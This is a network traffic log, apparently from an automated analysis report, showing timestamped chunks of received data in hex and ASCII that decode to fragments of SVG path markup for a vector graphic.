                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10859INData Raw: 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 35 2e 31 31 2c 32 34 39 2e 37 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,.18,3.32"/><path class="cls-9" d="M325.11,249.73a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10875INData Raw: 22 20 64 3d 22 4d 33 35 39 2e 35 37 2c 32 39 37 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: " d="M359.57,297.08a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10891INData Raw: 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 37 37 2c 33 33 36 2e 33 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: .6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M393.77,336.36a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10907INData Raw: 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f
                                                                                                                                                                                                                                                                          Data Ascii: 2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10923INData Raw: 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 35 37 2c 31 39 37 2e 30 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: .05,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M446.57,197.09a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10939INData Raw: 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 37 36 2c 32 33 36 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: .59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M480.76,236.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10955INData Raw: 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10971INData Raw: 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 34 32 2c 33 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.18,3.33"/><path class="cls-9" d="M549.42,323a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10987INData Raw: 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                          Data Ascii: 94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11003INData Raw: 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11019INData Raw: 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 36 31 2c 36 32 2e 37 39 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35
                                                                                                                                                                                                                                                                          Data Ascii: 1,.15,2.67"/><path class="cls-9" d="M360.61,62.79a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11035INData Raw: 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 38 2e 30 35 2c 39 34 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: .47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M388.05,94.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11051INData Raw: 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 34 39 2c 31 32 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c
                                                                                                                                                                                                                                                                          Data Ascii: .88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M415.49,125.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11067INData Raw: 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11083INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 3,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11099INData Raw: 20 64 3d 22 4d 34 38 35 2e 33 2c 34 35 2e 35 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: d="M485.3,45.59a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11115INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 37 34 2c 37 37 2e 31 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
